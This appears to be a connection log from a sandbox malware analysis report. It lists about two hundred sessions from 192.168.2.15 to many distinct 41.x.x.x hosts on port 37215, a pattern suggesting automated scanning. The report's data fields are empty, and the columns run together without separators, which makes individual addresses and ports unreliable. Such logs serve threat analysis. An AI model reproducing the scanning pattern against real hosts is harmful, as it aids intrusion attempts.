                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18348192.168.2.154879841.9.202.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18349192.168.2.154385641.62.101.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18350192.168.2.155998441.145.96.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18351192.168.2.153628241.213.41.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18352192.168.2.155875041.61.147.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18353192.168.2.153947241.160.157.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18354192.168.2.155659641.8.167.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18355192.168.2.155817041.143.123.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18356192.168.2.155373641.180.167.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18357192.168.2.155860841.164.201.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18358192.168.2.154699241.130.90.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18359192.168.2.153313441.36.154.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18360192.168.2.155607241.149.33.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18361192.168.2.154174841.89.246.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18362192.168.2.154128241.99.145.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18363192.168.2.154126441.24.141.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18364192.168.2.154615441.128.196.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18365192.168.2.154488241.255.248.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18366192.168.2.153497041.237.65.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18367192.168.2.154203441.173.151.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18368192.168.2.153973441.84.118.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18369192.168.2.154641441.33.253.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18370192.168.2.155463441.16.239.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18371192.168.2.155086841.70.125.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18372192.168.2.153540841.194.122.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18373192.168.2.154619041.118.165.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18374192.168.2.153475841.154.136.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18375192.168.2.153526041.175.188.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18376192.168.2.153658841.113.250.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18377192.168.2.154879841.101.35.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18378192.168.2.155906241.197.210.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18379192.168.2.155365241.189.134.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18380192.168.2.154505441.73.172.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18381192.168.2.155298841.214.78.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18382192.168.2.155130841.198.56.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18383192.168.2.155349041.233.1.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18384192.168.2.154366841.33.42.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18385192.168.2.155161841.26.215.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18386192.168.2.153528241.108.45.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18387192.168.2.154338641.150.4.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18388192.168.2.153576641.100.159.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18389192.168.2.156058441.101.117.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18390192.168.2.153922841.95.18.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18391192.168.2.154835841.215.172.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18392192.168.2.156065641.55.103.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18393192.168.2.155597441.167.215.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18394192.168.2.155701641.64.202.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18395192.168.2.154689641.248.244.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18396192.168.2.155574041.150.253.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18397192.168.2.155717241.130.46.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18398192.168.2.155801641.106.64.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18399192.168.2.153366641.182.134.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18400192.168.2.154803441.155.161.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18401192.168.2.155898641.184.242.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18402192.168.2.153599841.131.3.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18403192.168.2.154208641.79.52.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18404192.168.2.155662041.136.75.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18405192.168.2.154247841.135.19.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18406192.168.2.154334841.104.131.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18407192.168.2.154498441.28.161.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18408192.168.2.155973641.132.26.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18409192.168.2.153723041.182.228.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18410192.168.2.155320841.94.152.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18411192.168.2.154826641.39.225.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18412192.168.2.154038241.43.167.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18413192.168.2.155327041.92.87.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18414192.168.2.155722441.55.84.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18415192.168.2.153856841.15.197.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18416192.168.2.155740241.183.48.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18417192.168.2.154064041.13.121.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18418192.168.2.154715041.225.9.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18419192.168.2.154822241.80.209.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18420192.168.2.155794641.48.197.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18421192.168.2.154790441.109.206.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18422192.168.2.154793041.2.176.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18423192.168.2.156096441.37.145.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18424192.168.2.154361641.252.113.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18425192.168.2.154299841.172.213.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18426192.168.2.154456241.212.58.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18427192.168.2.154242241.220.101.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18428192.168.2.155714641.105.152.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18429192.168.2.155102441.97.192.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18430192.168.2.154309841.102.205.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18431192.168.2.155876441.8.243.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18432192.168.2.154227641.105.62.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18433192.168.2.154082441.23.85.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18434192.168.2.153774841.134.146.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18435192.168.2.155577841.103.48.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18436192.168.2.154711041.129.55.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18437192.168.2.154241641.123.179.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18438192.168.2.154783041.12.230.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18439192.168.2.155219041.146.172.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18440192.168.2.155470441.212.211.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18441192.168.2.153982041.42.179.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18442192.168.2.153867441.45.31.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18443192.168.2.155647441.104.175.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18444192.168.2.153486041.9.106.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18445192.168.2.154274441.82.240.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18446192.168.2.154686241.64.48.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18447192.168.2.153449641.68.143.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18448192.168.2.155776441.92.130.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18449192.168.2.153621041.120.233.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18450192.168.2.154623641.252.61.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18451192.168.2.154694041.211.172.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18452192.168.2.154540241.81.92.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18453192.168.2.155463041.165.115.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18454192.168.2.153941241.149.214.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18455192.168.2.154093641.132.120.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18456192.168.2.153369241.41.40.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18457192.168.2.153906241.10.87.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18458192.168.2.155798641.147.232.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18459192.168.2.154413641.177.50.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18460192.168.2.154531441.73.150.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18461192.168.2.155274441.37.140.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18462192.168.2.154537841.89.57.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18463192.168.2.153902241.212.9.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18464192.168.2.155647441.65.67.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18465192.168.2.154550841.146.64.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18466192.168.2.153618641.211.25.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18467192.168.2.154418641.89.53.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18468192.168.2.156063041.190.115.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18469192.168.2.155930241.175.45.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18470192.168.2.153680041.110.45.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18471192.168.2.154799041.124.146.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18472192.168.2.156096641.19.129.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18473192.168.2.154477241.73.190.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18474192.168.2.155307441.185.35.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18475192.168.2.153597641.115.81.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18476192.168.2.155793041.53.10.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18477192.168.2.153923441.253.206.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18478192.168.2.153692641.197.167.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18479192.168.2.155286441.152.35.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18480192.168.2.155997441.131.117.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18481192.168.2.154774041.127.109.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18482192.168.2.154357041.117.120.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18483192.168.2.155252041.154.77.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18484192.168.2.154267841.132.193.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18485192.168.2.153743041.130.156.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18486192.168.2.154156241.240.241.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18487192.168.2.155579041.94.155.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18488192.168.2.154734641.151.130.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18489192.168.2.153550041.198.170.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18490192.168.2.155508641.69.139.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18491192.168.2.154269241.160.52.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18492192.168.2.154592641.229.250.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18493192.168.2.156035241.149.99.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18494192.168.2.155713441.250.89.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18495192.168.2.154304641.79.224.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18496192.168.2.154538241.123.26.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18497192.168.2.155888241.26.58.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18498192.168.2.155526641.38.21.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18499192.168.2.154462241.157.173.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18500192.168.2.155400641.213.27.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18501192.168.2.153627841.105.26.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18502192.168.2.154271841.121.27.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18503192.168.2.153278441.205.205.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18504192.168.2.155174041.167.82.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18505192.168.2.153616841.8.178.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18506192.168.2.154833641.210.116.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18507192.168.2.155718841.112.60.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18508192.168.2.154227841.56.14.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18509192.168.2.153284641.107.83.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18510192.168.2.155459241.86.254.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18511192.168.2.154944841.126.135.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18512192.168.2.155732841.93.2.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18513192.168.2.153426241.216.180.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18514192.168.2.155086841.232.206.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18515192.168.2.153333641.17.157.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18516192.168.2.155973641.46.98.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18517192.168.2.154544441.167.250.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18518192.168.2.155126441.180.55.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18519192.168.2.154574841.254.122.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18520192.168.2.154512041.52.163.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18521192.168.2.156034041.93.149.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18522192.168.2.153312241.203.122.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18523192.168.2.155089041.45.65.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18524192.168.2.154354241.246.157.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18525192.168.2.154956241.4.104.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18526192.168.2.153729841.58.11.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18527192.168.2.153736041.131.219.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18528192.168.2.155505241.135.150.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18529192.168.2.155427841.231.241.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18530192.168.2.155365441.149.233.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18531192.168.2.153923041.26.43.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18532192.168.2.154825841.129.156.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18533192.168.2.153461441.126.7.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18534192.168.2.155159041.205.160.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18535192.168.2.154106241.215.46.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18536192.168.2.154293641.79.18.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18537192.168.2.154177641.115.253.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18538192.168.2.155378441.244.233.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18539192.168.2.153431841.167.102.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18540192.168.2.153892841.119.252.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18541192.168.2.155840241.134.222.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18542192.168.2.154396841.240.192.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18543192.168.2.154279441.21.246.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18544192.168.2.156075441.189.225.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18545192.168.2.154694241.31.199.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18546192.168.2.155902841.112.38.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18547192.168.2.153950841.195.11.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18548192.168.2.154094241.26.30.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18549192.168.2.153598841.0.143.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
